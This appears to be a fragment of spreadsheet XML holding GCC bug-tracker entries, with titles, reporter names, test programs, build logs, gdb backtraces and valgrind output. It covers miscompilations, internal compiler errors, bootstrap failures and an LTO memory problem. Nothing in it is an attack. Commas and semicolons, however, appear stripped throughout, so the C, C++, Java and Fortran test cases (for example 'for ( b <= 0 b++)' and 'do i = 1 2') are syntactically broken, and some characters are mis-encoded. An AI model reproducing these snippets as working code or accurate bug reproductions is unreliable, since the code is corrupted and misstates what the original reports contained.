  type (StratSeq) allocatable dimension( : ) :: seq
  allocate( seq(10) )
  call init( ke_strat lw_strat )
  call ke_strat % preUpdate()
  call ke_strat % update()
  call ke_strat % postUpdate()
  seq( 1 ) % strat =&gt; ke_strat
  seq( 2 ) % strat =&gt; lw_strat
  call seq( 1 ) % strat % update()
  do i = 1 2
     call seq( i ) % strat % update()
  end do
end program main</t>
  </si>
  <si>
    <t>david.car7</t>
  </si>
  <si>
    <t>GCC-70127</t>
  </si>
  <si>
    <t>[6 Regression] wrong code on x86_64-linux-gnu at -O3 in 32-bit and 64-bit modes</t>
  </si>
  <si>
    <t>The following code is miscompiled by the trunk gcc-4.7 and gcc-4.8 at -O3 in both 32-bit and 64-bit modes on x86_64-linux-gnu. 
$: gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/6.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-source-trunk/configure --enable-languages=cc++lto --prefix=/usr/local/gcc-trunk --disable-bootstrap
Thread model: posix
gcc version 6.0.0 20160307 (experimental) [trunk revision 234022] (GCC) 
$: 
$: gcc-trunk -O3 small.c  ./a.out
0
$: gcc-4.7 -O3 small.c  ./a.out
0
$: gcc-4.8 -O3 small.c  ./a.out
0
$: gcc-trunk -O0 small.c  ./a.out
1
$: cat small.c
int printf(const char * ...)
struct S0 {
    int f0
    signed f1 : 2
} a[1] c = {5 1} d
short b
int main() {
    for ( b &lt;= 0 b++) {
        struct S0 e = {1 1}
        d = e = a[0] = c
    }
    printf(%d\n a[0].f1)
    return 0
}
$:</t>
  </si>
  <si>
    <t>GCC-48978</t>
  </si>
  <si>
    <t>excessive hash table allocation for large lto build</t>
  </si>
  <si>
    <t>I tried a large LTO build with gcc version 4.7.0 20110511 (experimental) (GCC) 
on a 18GB machine. It ended with
lto1: out of memory allocating 8589934312 bytes after a total of 6827421696 bytes
Since a 7+GB single malloc seems somewhat excessive I put a break point 
on xmalloc_failed. It looks like the hash tables are growing
too aggressively?
#0  xmalloc_failed (size=8589934312) at ../../gcc/libiberty/xmalloc.c:118
#1  0x0000000000b1b8a8 in xcalloc (nelem=1073741789 elsize=8)
    at ../../gcc/libiberty/xmalloc.c:164
#2  0x0000000000b16696 in htab_expand (htab=0x11949c0)
    at ../../gcc/libiberty/hashtab.c:558
#3  0x0000000000b16faa in htab_find_slot_with_hash (htab=0x11949c0
    element=0x7fff64c7d0c0 hash=2685589897 insert=INSERT)
    at ../../gcc/libiberty/hashtab.c:653
#4  0x00000000005a9701 in lookup_type_pair (ob_p=0x1022380
    visited_p=0x1022370 t1= t2=)
    at ../../gcc/gcc/gimple.c:3284
#5  0x00000000005b1235 in gtc_visit (sccstate_obstack=Unhandled dwarf expression opcode 0xf3
)
    at ../../gcc/gcc/gimple.c:3557
#6  gtc_visit (sccstate_obstack=Unhandled dwarf expression opcode 0xf3
) at ../../gcc/gcc/gimple.c:3473
#7  0x00000000005b0d69 in gimple_types_compatible_p_1 (t1=0x2aff61dc3b28
    t2=0x2affd032b150 p=0x197c33a70 sccstack=0x7fff64c7d188
    sccstate=0x9817ee40 sccstate_obstack=0x7fff64c7d190)
    at ../../gcc/gcc/gimple.c:3717
#8  0x00000000005af31e in gimple_types_compatible_p (t2=0x2affd032b150
    t1=0x2aff61dc3b28) at ../../gcc/gcc/gimple.c:3987
#9  gimple_type_eq (t2=0x2affd032b150 t1=0x2aff61dc3b28)
    at ../../gcc/gcc/gimple.c:4444
#10 0x0000000000b16f1e in htab_find_slot_with_hash (htab=0x2aff56172a10
    element=0x2affd032b150 hash=Unhandled dwarf expression opcode 0xf3
) at ../../gcc/libiberty/hashtab.c:687
#11 0x00000000005af4cd in gimple_register_type (t=0x2affd032b150)
    at ../../gcc/gcc/gimple.c:4480
#12 0x000000000049c670 in lto_ft_common (t=0x2affd032aab0)
    at ../../gcc/gcc/lto/lto.c:296
#13 0x000000000049c6b9 in lto_ft_decl_minimal (t=0x2affd032aab0)
    at ../../gcc/gcc/lto/lto.c:309
#14 lto_ft_decl_common (t=0x2affd032aab0) at ../../gcc/gcc/lto/lto.c:319
---Type  to continue or q  to quit---
#15 0x000000000049d25d in lto_ft_field_decl (t=0x2affd032aab0)
    at ../../gcc/gcc/lto/lto.c:364
#16 lto_fixup_types (t=0x2affd032aab0) at ../../gcc/gcc/lto/lto.c:542
#17 0x000000000049ddd0 in uniquify_nodes (from=671
    data_in=) at ../../gcc/gcc/lto/lto.c:618
#18 lto_read_decls (from=671 data_in=)
    at ../../gcc/gcc/lto/lto.c:697
#19 lto_file_finalize (from=671 data_in=)
    at ../../gcc/gcc/lto/lto.c:921
#20 lto_create_files_from_ids (from=671 data_in=)
    at ../../gcc/gcc/lto/lto.c:939
#21 0x0000000000b1b6cf in splay_tree_foreach_helper (data=0x7fff64c7d520
    fn=0x49dca0  node=0x825f6550)
    at ../../gcc/libiberty/splay-tree.c:242
#22 splay_tree_foreach (data=0x7fff64c7d520
    fn=0x49dca0  node=0x825f6550)
    at ../../gcc/libiberty/splay-tree.c:566
#23 0x000000000049f53c in lto_file_read (count=0x7fff64c7d4f0
    resolution_file=0x15b8ed0 file=0x23d9eac0) at ../../gcc/gcc/lto/lto.c:979
#24 read_cgraph_and_symbols (count=0x7fff64c7d4f0 resolution_file=0x15b8ed0
    file=0x23d9eac0) at ../../gcc/gcc/lto/lto.c:2321
#25 lto_main (count=0x7fff64c7d4f0 resolution_file=0x15b8ed0 file=0x23d9eac0)
    at ../../gcc/gcc/lto/lto.c:2621
#26 0x00000000006cf4aa in compile_file () at ../../gcc/gcc/toplev.c:570
#27 do_compile () at ../../gcc/gcc/toplev.c:1905
#28 toplev_main () at ../../gcc/gcc/toplev.c:1977
#29 0x00002aff56c32a7d in __libc_start_main () from /lib64/libc.so.6
#30 0x0000000000486c49 in _start () at ../sysdeps/x86_64/elf/start.S:113</t>
  </si>
  <si>
    <t>GCC-57385</t>
  </si>
  <si>
    <t>[tree-ssa] Possible segfault in fully_constant_vn_reference_p</t>
  </si>
  <si>
    <t>The following code crashes android ndk gcc-4.6 on 64 bit windows with segfault  on at least -O1:
int c
void foo(int f)
{
    int wbi=-1
    c = (f ? 012346000000000000:01345:000000006008)[wbi]
}
However potentially it can appear on trunk as well: the reason for this is that in fully_constant_vn_reference_p we have a bound violation:
1303|       if (arg0-&gt;opcode == STRING_CST
1304|           &amp;&amp; (TYPE_MODE (op-&gt;type)
1305|               == TYPE_MODE (TREE_TYPE (TREE_TYPE (arg0-&gt;op0))))
1306|           &amp;&amp; GET_MODE_CLASS (TYPE_MODE (op-&gt;type)) == MODE_INT
1307|           &amp;&amp; GET_MODE_SIZE (TYPE_MODE (op-&gt;type)) == 1
1308|           &amp;&amp; compare_tree_int (op-&gt;op0 TREE_STRING_LENGTH (arg0-&gt;op0)) &lt; 0)
1309|         return build_int_cst_type (op-&gt;type
1310+&gt;                                   (TREE_STRING_POINTER (arg0-&gt;op0)
1311|                                     [TREE_INT_CST_LOW (op-&gt;op0)]))
here the TREE_INT_CST_LOW (op-&gt;op0) is 0xffffffff (wbi from the code snippet above and int_cst.low is unsigned). but here:
1308|           &amp;&amp; compare_tree_int (op-&gt;op0 TREE_STRING_LENGTH (arg0-&gt;op0)) &lt; 0)
compare_tree_int thinks that op-&gt;op0 equals to -1 and so the check for bound violation passes.
I think we need to add another check that op-&gt;op0 is not less than zero here.</t>
  </si>
  <si>
    <t>GCC-159</t>
  </si>
  <si>
    <t>members with same name as class cause ICE</t>
  </si>
  <si>
    <t xml:space="preserve"> Original-Message-Id: 
 Date: Wed 29 Mar 2000 23:51:37 EST
 Bug type:
 internal compiler error in gcc 2.95.2
 Platform:
 uname -a
 SunOS process.ecn.purdue.edu 5.7 Generic_106541-10 sun4u sparc SUNWUltra-5_10
 Verbose output:
 /opt/gcc/2.95.2/bin/g++ -Dsolaris --save-temps -v -fpermissive -I.. -w -g -ftemplate-depth-100 -I/home/lpmpc/b/applequi/Lib/Lin_alg -I/home/lpmpc/b/applequi/Lib/gea/ -I/home/lpmpc/b/applequi/G/polytope/vinci/vinci-1/  -c ../infiles.C
 Reading specs from /opt/gcc/2.95.2/lib/gcc-lib/sparc-sun-solaris2.6/2.95.2/specs
 gcc version 2.95.2 19991024 (release)
 GNU CPP version 2.95.2 19991024 (release) (sparc)
 #include ... search starts here:
 #include  search starts here:
  ..
  /home/lpmpc/b/applequi/Lib/Lin_alg
  /home/lpmpc/b/applequi/Lib/gea
  /home/lpmpc/b/applequi/G/polytope/vinci/vinci-1
  /opt/gcc/2.95.2/lib/gcc-lib/sparc-sun-solaris2.6/2.95.2/../../../../include/g++-3
  /usr/local/include
  /opt/gcc/2.95.2/lib/gcc-lib/sparc-sun-solaris2.6/2.95.2/../../../../sparc-sun-solaris2.6/include
  /opt/gcc/2.95.2/lib/gcc-lib/sparc-sun-solaris2.6/2.95.2/include
  /usr/include
 End of search list.
 The following default directories have been omitted from the search path:
 End of omitted list.
  /opt/gcc/2.95.2/lib/gcc-lib/sparc-sun-solaris2.6/2.95.2/cc1plus infiles.ii -quiet -dumpbase infiles.cc -g -w -version -fpermissive -ftemplate-depth-100 -o infiles.s
 GNU C++ version 2.95.2 19991024 (release) (sparc-sun-solaris2.6) compiled by GNU C version 2.95.2 19991024 (release).
 ../infiles.C:5: Internal compiler error.
 ../infiles.C:5: Please submit a full bug report.
 ../infiles.C:5: See  for instructions.
Release:
2.95.2 3.0 (20010505)</t>
  </si>
  <si>
    <t>GCC-19674</t>
  </si>
  <si>
    <t>Empty declaration through semicolon () causes compile failure</t>
  </si>
  <si>
    <t>The following program doesn't compile:
public interface OutSideInterface
{
  public interface InsideInterface
  {
    void m(int p int p2)
  }
}
Note the empty statement (semicolon) on line 6.
This is legal (jikes accepts it) but deprecated.
Compiling with -C gives:
OutSideInterface.java:6: error: '{' expected.
     }
      ^
OutSideInterface.java:7: error: Class or interface declaration expected.
   }
   ^
2 errors
Reported by Jerry Haltom.
With -Wextraneous-semicolon the compiler does see that this is just an declaration:
OutSideInterface.java:6: warning: An empty declaration is a deprecated feature
that should not be used.</t>
  </si>
  <si>
    <t>GCC-195</t>
  </si>
  <si>
    <t>g++ error</t>
  </si>
  <si>
    <t xml:space="preserve"> Date: Tue 2 May 2000 14:39:49 +0200 (MET DST)
 Original-Message-ID: 
 This popped up when I was compiling. My code is wrong but so is
 (apparently) the compiler. Well of to write better code...
Release:
2.95.2
How-To-Repeat:
See attachments for tagtype.ii.bz2
</t>
  </si>
  <si>
    <t>GCC-52894</t>
  </si>
  <si>
    <t>[4.54.64.7 Regression] Stage1 bootstrap fails with gcc-4.6.3: Infinite loop in pointer_set_insert</t>
  </si>
  <si>
    <t>Bootstrap fails with Debian gcc-4.6.3-2 and gcc-4.7.0-2.  The failure
was most likely caused by r185758 based on backtrace:
	PR middle-end/52640
	* varasm.c: Include pointer-set.h.
	(pending_assemble_externals_set): New pointer set.
	(process_pending_assemble_externals): Destroy the pointer set.
	(assemble_external): See if decl is in pending_assemble_externals_set
	and add it to pending_assemble_externals if necessary.
	(init_varasm_once): Allocate pending_assemble_externals_set.
gcc-4.6.3-1 and gcc-4.7.0-1 were ok.
The cause of the loop is as yet unclear but it is clearly not associated
with the above change.  The failure occurs compiling a number of files in
stage1.  It seems to be associated with the second vector allocation
in pointer_set_insert.
Triggered with the following options:
-fpreprocessed cgraphbuild.i -quiet -dumpbase cgraphbuild.c -auxbase-strip cgraphbuild.o -g -Wextra -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -Wold-style-definition -Wc++-compat -version -fkeep-inline-functions -fno-common -o cgraphbuild.s</t>
  </si>
  <si>
    <t>GCC-50991</t>
  </si>
  <si>
    <t>crtstuff.c:65:23: fatal error: libgcc_tm.h: No such file or  directory</t>
  </si>
  <si>
    <t>Seems to be a dependency error in generating libgcc_tm.h at -j4.
make[3]: Entering directory `/home/dave/gnu/gcc/objdir/hppa-linux-gnu/libgcc'
# If this is the top-level multilib build all the other
DEFINES='' HEADERS='' \
                ../../../gcc/libgcc/mkheader.sh &gt; tmp-libgcc_tm.h
/home/dave/gnu/gcc/objdir/./gcc/xgcc -B/home/dave/gnu/gcc/objdir/./gcc/ -B/home/dave/opt/gnu/gcc/gcc-4.7.0/hppa-linux-gnu/bin/ -B/home/dave/opt/gnu/gcc/gcc-4.7.0/hppa-linux-gnu/lib/ -isystem /home/dave/opt/gnu/gcc/gcc-4.7.0/hppa-linux-gnu/include -isystem /home/dave/opt/gnu/gcc/gcc-4.7.0/hppa-linux-gnu/sys-include    -g -O2 -O2 -g -O2 -DIN_GCC   -W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition  -isystem ./include  -I. -I. -I../.././gcc -I../../../gcc/libgcc -I../../../gcc/libgcc/. -I../../../gcc/libgcc/../gcc -I../../../gcc/libgcc/../include   -g0 -finhibit-size-directive -fno-inline -fno-exceptions -fno-zero-initialized-in-bss -fno-toplevel-reorder -fno-tree-vectorize -fno-stack-protector  -I. -I. -I../.././gcc -I../../../gcc/libgcc -I../../../gcc/libgcc/. -I../../../gcc/libgcc/../gcc -I../../../gcc/libgcc/../include  -o crtbegin.o -MT crtbegin.o -MD -MP -MF crtbegin.dep  -c ../../../gcc/libgcc/crtstuff.c -DCRT_BEGIN
/home/dave/gnu/gcc/objdir/./gcc/xgcc -B/home/dave/gnu/gcc/objdir/./gcc/ -B/home/dave/opt/gnu/gcc/gcc-4.7.0/hppa-linux-gnu/bin/ -B/home/dave/opt/gnu/gcc/gcc-4.7.0/hppa-linux-gnu/lib/ -isystem /home/dave/opt/gnu/gcc/gcc-4.7.0/hppa-linux-gnu/include -isystem /home/dave/opt/gnu/gcc/gcc-4.7.0/hppa-linux-gnu/sys-include    -g -O2 -O2 -g -O2 -DIN_GCC   -W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition  -isystem ./include  -I. -I. -I../.././gcc -I../../../gcc/libgcc -I../../../gcc/libgcc/. -I../../../gcc/libgcc/../gcc -I../../../gcc/libgcc/../include   -g0 -finhibit-size-directive -fno-inline -fno-exceptions -fno-zero-initialized-in-bss -fno-toplevel-reorder -fno-tree-vectorize -fno-stack-protector  -I. -I. -I../.././gcc -I../../../gcc/libgcc -I../../../gcc/libgcc/. -I../../../gcc/libgcc/../gcc -I../../../gcc/libgcc/../include  -o crtbeginS.o -MT crtbeginS.o -MD -MP -MF crtbeginS.dep  -fPIC -c ../../../gcc/libgcc/crtstuff.c -DCRT_BEGIN -DCRTSTUFFS_O
# multilibs.
/bin/bash ../../../gcc/libgcc/../move-if-change tmp-libgcc_tm.h libgcc_tm.h
../../../gcc/libgcc/crtstuff.c:65:23: fatal error: libgcc_tm.h: No such file or directory
compilation terminated.
make[3]: *** [crtbegin.o] Error 1
make[3]: *** Waiting for unfinished jobs....
echo timestamp &gt; libgcc_tm.stamp
../../../gcc/libgcc/crtstuff.c: In function â€˜frame_dummyâ€™:
../../../gcc/libgcc/crtstuff.c:387:19: warning: array subscript is above array bounds [-Warray-bounds]
make[4]: Entering directory `/home/dave/gnu/gcc/objdir/hppa-linux-gnu/libgcc'</t>
  </si>
  <si>
    <t>GCC-43414</t>
  </si>
  <si>
    <t>DWARF4: Use DW_AT_main_subprogram for MAIN__</t>
  </si>
  <si>
    <t>DWARF4 draft: http://dwarfstd.org/doc/DWARF4-public-review.pdf
gfortran uses
  main()
to initialize the program and
  MAIN__
as actual Fortran program.
DWARF4 offers:
  DW_AT_main_subprogram   Main or starting subprogram
                          Unit containing main or starting subprogram
File: gcc/fortran/trans-decl.c:
The main program is generated in create_main_function the MAIN__ subprogram is generated gfc_generate_function_code (only if sym-&gt;attr.is_main_program).
gcc/dwarf2out.c already has DW_AT_main_subprogram defined.</t>
  </si>
  <si>
    <t>GCC-1911</t>
  </si>
  <si>
    <t>2.95 doesn't FOO</t>
  </si>
  <si>
    <t>BAR is an empty class used to make a constructor in FOO. A temporary BAR object is sent to FOO's constructor but nothing happens. The compiler simply ignors the code.
The bug happens in various versions of g++ while in other compilers like solaris and MFC it doesn't occuer.
Release:
2.95 and prior
Environment:
solaris PC
How-To-Repeat:
Compile the attached  6 lines program and run</t>
  </si>
  <si>
    <t>ipelet</t>
  </si>
  <si>
    <t>GCC-56968</t>
  </si>
  <si>
    <t>[4.7/4.8/4.9 Regression] [F03] Issue with a procedure defined with a generic name returning procedure pointer</t>
  </si>
  <si>
    <t>Created attachment 29875
Test case that shows the bug
In short a genericly named procedure fails to return a procedure pointer :
    ptr =&gt; specific_name_get_proc_ptr()	! OK
    ptr =&gt; generic_name_get_proc_ptr()  ! KO
           1
Error: Interface mismatch in procedure pointer assignment at (1):
Type/rank mismatch in return value of 'generic_name_get_proc_ptr'
Attached is a test case that show the problem with gfortran 4.7 4.8 and
trunk.
See http://gcc.gnu.org/ml/fortran/2013-04/msg00151.html for the complete story.</t>
  </si>
  <si>
    <t>samuel.debionne</t>
  </si>
  <si>
    <t>GCC-36943</t>
  </si>
  <si>
    <t>[c++0x] Use of nested C++0x initializer list for non-aggregate rejected</t>
  </si>
  <si>
    <t>C++0x-style initializer list support was recently added but the following valid code is rejected:
  struct p { p(int int) }
  p a[] = { { 3 2 } }
With -std=c++0x the second line results in:
  error: braces around scalar initializer for type 'p'</t>
  </si>
  <si>
    <t>GCC-1261</t>
  </si>
  <si>
    <t>protected field access not restricted between packages</t>
  </si>
  <si>
    <t>A protected field in anything other than this should 
not be accessible to a class outside the current instance
if it is declared in another package (even if the current
class is a subclass of the declaring class)
gcj incorrectly permits the following code:
// file: pkg1/A.java
package pkg1
public class A 
{
  protected int i
}
// file: pkg2/B.java
package pkg2
public class B extends pkg1.A 
{
  public B(pkg1.A a)
  {
    int i = a.i
  }  
}
Note that this code is still incorrectly accepted even if 
the extends pkg1.A is removed.
Release:
unknown
Environment:
gcc version 2.96 20000525 (experimental)
How-To-Repeat:
Compile the above test case.</t>
  </si>
  <si>
    <t>GCC-55430</t>
  </si>
  <si>
    <t>[4.8 Regression] LRA miscompilation of ree.c</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #55358 +++
With revision 193546 valgrind reports:
==26359== Invalid read of size 4
==26359==    at 0xB58AEE: rest_of_handle_ree() (ree.c:617)
==26359==    by 0x74ADA3: execute_one_pass(opt_pass*) (passes.c:2339)
==26359==    by 0x74B174: execute_pass_list(opt_pass*) (passes.c:2400)
==26359==    by 0x74B186: execute_pass_list(opt_pass*) (passes.c:2401)
==26359==    by 0x74B186: execute_pass_list(opt_pass*) (passes.c:2401)
==26359==    by 0x5AB16D: expand_function(cgraph_node*) (cgraphunit.c:1643)
==26359==    by 0x5AC786: compile() (cgraphunit.c:1747)
==26359==    by 0x5ACBA9: finalize_compilation_unit() (cgraphunit.c:2122)
==26359==    by 0x4E47DF: c_write_global_declarations() (c-decl.c:10128)
==26359==    by 0x7D7F4C: compile_file() (toplev.c:559)
==26359==    by 0x7D9AA7: toplev_main(int char**) (toplev.c:1881)
==26359==    by 0x38F3A21674: (below main) (in /usr/lib64/libc-2.15.so)
==26359==  Address 0x4e10d51 is 2785 bytes inside a block of size 2788 alloc'd
==26359==    at 0x4A06B0F: calloc (vg_replace_malloc.c:593)
==26359==    by 0xC0F708: xcalloc (xmalloc.c:162)
==26359==    by 0xB59070: rest_of_handle_ree() (ree.c:886)</t>
  </si>
  <si>
    <t>GCC-21063</t>
  </si>
  <si>
    <t>ICE in gfc_conv_ss_descriptor at fortran/trans-array.c:1224 after using maxloc function</t>
  </si>
  <si>
    <t>Here's the piece of code:
program bug
real dimension(100) :: dummy
real dimension(100) :: foo
integer :: i
do i=1100
  call random_number(dummy(i))
  call random_number(foo(i))
end do
write(**) foo(maxloc(dummy))
end program
and the output.
bash-2.05b$ gfc bug.f90
bug.f90: In function 'MAIN__':
bug.f90:12: internal compiler error: in gfc_conv_ss_descriptor at
fortran/trans-array.c:1224
Please submit a full bug report
bash-2.05b$ gfc --version
GNU Fortran 95 (GCC 4.1.0 20050416 (experimental))
Copyright (C) 2005 Free Software Foundation Inc.</t>
  </si>
  <si>
    <t>guillemborrell</t>
  </si>
  <si>
    <t>GCC-128</t>
  </si>
  <si>
    <t>gcc 2.95.2 doesn't fully zero-initialize character arrays</t>
  </si>
  <si>
    <t xml:space="preserve"> Original-Message-ID: 
 Date: Wed 22 Mar 2000 22:22:06 -0700
 Hi
 gcc doesn't zero out explicitly uninitialized elements of a character array
 (required by 6.7.8 p21 of C99 - this seems to be a change from C89).
 Regards
 Martin
 PS This is not a bug report since C99 wasn't ratified until the end of '99.
 Test case: on i86 when built with no compiler options the program returns 1 0
 is expected.
 int foo ()
 {
     char s[2] = 
     return 0 == s[1]
 }
 int main ()
 {
     {   // dirty up the stack
	 char s[] = x
     }
     return !foo ()
 }
Release:
2.95.2
How-To-Repeat:
I've entered a testcase for this bug in the testsuite as
gcc.c-torture/execute/20000801-4.c.
It is indeed a bug the correction to the standard was
first made in Technical Corrigendum 2 to the old standard
in response to Defect Reports #060 and #092.</t>
  </si>
  <si>
    <t>GCC-83886</t>
  </si>
  <si>
    <t>[8 Regression] ICE in cfg_layout_redirect_edge_and_branch at cfgrtl.c:4433</t>
  </si>
  <si>
    <t>gcc-8.0.0-alpha20180114 snapshot (r256677) ICEs when compiling the following snippet w/ -O2 -floop-parallelize-all -fmodulo-sched -fno-tree-forwprop -fno-tree-loop-im:
int ga as
void
xj (int sm int vs)
{
  if (0)
    for ()
      while (sm &lt; 1)
        for (as = 0 as &lt; 1 ++as)
          {
 o3:
          }
  while (vs &lt; 1)
    {
      for (ga = 0 ga &lt; 9 ++ga)
        {
        }
      ++vs
    }
  goto o3
}
% gcc-8.0.0-alpha20180114 -O2 -floop-parallelize-all -fmodulo-sched -fno-tree-forwprop -fno-tree-loop-im -c pa4nrhpq.c
during RTL pass: sms
pa4nrhpq.c: In function 'xj':
pa4nrhpq.c:25:1: internal compiler error: in cfg_layout_redirect_edge_and_branch at cfgrtl.c:4433
 }
 ^
0x5ce23b cfg_layout_redirect_edge_and_branch
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20180114/work/gcc-8-20180114/gcc/cfgrtl.c:4433
0x8990f8 cfg_layout_redirect_edge_and_branch_force
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20180114/work/gcc-8-20180114/gcc/cfgrtl.c:4443
0x8825b3 redirect_edge_and_branch_force(edge_def* basic_block_def*)
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20180114/work/gcc-8-20180114/gcc/cfghooks.c:486
0x882fbd make_forwarder_block(basic_block_def* bool (*)(edge_def*) void (*)(basic_block_def*))
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20180114/work/gcc-8-20180114/gcc/cfghooks.c:893
0x88b74b merge_latch_edges
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20180114/work/gcc-8-20180114/gcc/cfgloop.c:780
0x88b74b disambiguate_multiple_latches
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20180114/work/gcc-8-20180114/gcc/cfgloop.c:831
0x88b74b disambiguate_loops_with_multiple_latches()
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20180114/work/gcc-8-20180114/gcc/cfgloop.c:844
0xb0aec4 apply_loop_flags
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20180114/work/gcc-8-20180114/gcc/loop-init.c:54
0xb0b8ec loop_optimizer_init(unsigned int)
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20180114/work/gcc-8-20180114/gcc/loop-init.c:123
0x14ce819 sms_schedule
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20180114/work/gcc-8-20180114/gcc/modulo-sched.c:1354
0x14d111f execute
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20180114/work/gcc-8-20180114/gcc/modulo-sched.c:3345</t>
  </si>
  <si>
    <t>GCC-47430</t>
  </si>
  <si>
    <t>[4.6 Regression] Random PCH related bootstrap failures on powerpc64-linux</t>
  </si>
  <si>
    <t>I saw during the weekend two bootstrap failures in libstdc++.
The problem seems to be that powerpc64 uses very large pages (64KB) address space randomization and the fact that for building stdtr1c++.h.gch and extc++.h.gch uses stdc++.h.gch.
When building e.g. stdtr1c++.h.gch stdc++.h.gch already likely exists and thus
it first mmaps stdc++.h.gch at the desired address which is likely TRY_EMPTY_VM_SPACE (OT for __powerpc__ &amp;&amp; __LP64__ shouldn't it use some larger value say 0x6000000000ULL ?) thus when attempting to determine best VM slot for stdtr1c++.h.gch that slot is already taken by stdc++.h.gch and thus
can't be used.  While there is some code to attempt to handle address space randomization perhaps 32MB works well for 4KB pages but is too small for larger pages or something but it certainly fails from time to time on ppc64 and some shared library is mmapped at that point.
Potential ways how to fix this one or more of:
1) in host-linux.c define more than one TRY_EMPTY_VM_SPACE value for each OS and if mmap at TRY_EMPTY_VM_SPACE fails try TRY_EMPTY_VM_SPACE2 which is say 0x70000000 for most 32-bit hosts and some GB appart from TRY_EMPTY_VM_SPACE for 64-bit hosts.
2) make sure other PCH is not read during compilation that is writing PCH
3) change the logic for address space randomization in host-linux.c use larger buffer if page size is &gt; 4KB
4) change libstdc++ makefiles to make sure stdc++.h.gch does not exist when building the other *.gch files use explicit ordering in the Makefile that it is first rm -f'ed then the other gch files built then stdc++.h.gch built
Preferences?</t>
  </si>
  <si>
    <t>GCC-80982</t>
  </si>
  <si>
    <t>gcc.target/powerpc/builtins-3-runnable.c fails starting with its introduction in r248846</t>
  </si>
  <si>
    <t>This fails only on BE
Executing on host: /home/seurer/gcc/build/gcc-trunk/gcc/xgcc -B/home/seurer/gcc/build/gcc-trunk/gcc/ /home/seurer/gcc/gcc-trunk/gcc/testsuite/gcc.target/powerpc/builtins-3-runnable.c   -fno-diagnostics-show-caret -fdiagnostics-color=never   -O2 -mvsx -mcpu=power8  -lm    -o ./builtins-3-runnable.exe    (timeout = 300)
spawn -ignore SIGHUP /home/seurer/gcc/build/gcc-trunk/gcc/xgcc -B/home/seurer/gcc/build/gcc-trunk/gcc/ /home/seurer/gcc/gcc-trunk/gcc/testsuite/gcc.target/powerpc/builtins-3-runnable.c -fno-diagnostics-show-caret -fdiagnostics-color=never -O2 -mvsx -mcpu=power8 -lm -o ./builtins-3-runnable.exe
/tmp/ccYc5Gcs.s: Assembler messages:
/tmp/ccYc5Gcs.s:123: Error: operand out of range (8 is not between 0 and 3)
/tmp/ccYc5Gcs.s:142: Error: operand out of range (8 is not between 0 and 3)
compiler exited with status 1
output is:
/tmp/ccYc5Gcs.s: Assembler messages:
/tmp/ccYc5Gcs.s:123: Error: operand out of range (8 is not between 0 and 3)
/tmp/ccYc5Gcs.s:142: Error: operand out of range (8 is not between 0 and 3)
FAIL: gcc.target/powerpc/builtins-3-runnable.c (test for excess errors)
Excess errors:
/tmp/ccYc5Gcs.s:123: Error: operand out of range (8 is not between 0 and 3)
/tmp/ccYc5Gcs.s:142: Error: operand out of range (8 is not between 0 and 3)</t>
  </si>
  <si>
    <t>GCC-34498</t>
  </si>
  <si>
    <t>FAIL: 22_locale/global_templates/standard_facet_hierarchies.cc execution test</t>
  </si>
  <si>
    <t>Executing on host: /mnt/gnu/gcc/objdir/./gcc/g++ -shared-libgcc -B/mnt/gnu/gcc/o
bjdir/./gcc -nostdinc++ -L/mnt/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/libstdc++-v3
/src -L/mnt/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/libstdc++-v3/src/.libs -B/opt/g
nu/gcc/gcc-4.2.3/hppa2.0w-hp-hpux11.11/bin/ -B/opt/gnu/gcc/gcc-4.2.3/hppa2.0w-hp
-hpux11.11/lib/ -isystem /opt/gnu/gcc/gcc-4.2.3/hppa2.0w-hp-hpux11.11/include -i
system /opt/gnu/gcc/gcc-4.2.3/hppa2.0w-hp-hpux11.11/sys-include -g -O2 -D_GLIBCX
X_ASSERT -fmessage-length=0 -g -O2 -DLOCALEDIR=. -nostdinc++ -I/mnt/gnu/gcc/ob
jdir/hppa2.0w-hp-hpux11.11/libstdc++-v3/include/hppa2.0w-hp-hpux11.11 -I/mnt/gnu
/gcc/objdir/hppa2.0w-hp-hpux11.11/libstdc++-v3/include -I/mnt/gnu/gcc/gcc/libstd
c++-v3/libsupc++ -I/mnt/gnu/gcc/gcc/libstdc++-v3/include/backward -I/mnt/gnu/gcc
/gcc/libstdc++-v3/testsuite/util /mnt/gnu/gcc/gcc/libstdc++-v3/testsuite/22_loca
le/global_templates/standard_facet_hierarchies.cc    -include bits/stdc++.h ./li
btestc++.a  -lm   -o ./standard_facet_hierarchies.exe    (timeout = 600)
PASS: 22_locale/global_templates/standard_facet_hierarchies.cc (test for excess
errors)
Setting LD_LIBRARY_PATH to :/mnt/gnu/gcc/objdir/gcc:/mnt/gnu/gcc/objdir/hppa2.0w
-hp-hpux11.11/./libstdc++-v3/src/.libs::/mnt/gnu/gcc/objdir/gcc:/mnt/gnu/gcc/obj
dir/hppa2.0w-hp-hpux11.11/./libstdc++-v3/src/.libs
terminate called after throwing an instance of 'std::runtime_error'
  what():  locale::facet::_S_create_c_locale name not valid
FAIL: 22_locale/global_templates/standard_facet_hierarchies.cc execution test</t>
  </si>
  <si>
    <t>GCC-38446</t>
  </si>
  <si>
    <t>[graphite] The def for a var exists inside one of the scops bb's but an appropriate phi is not created to allow the phi to reach the use of that def ouside the scop.</t>
  </si>
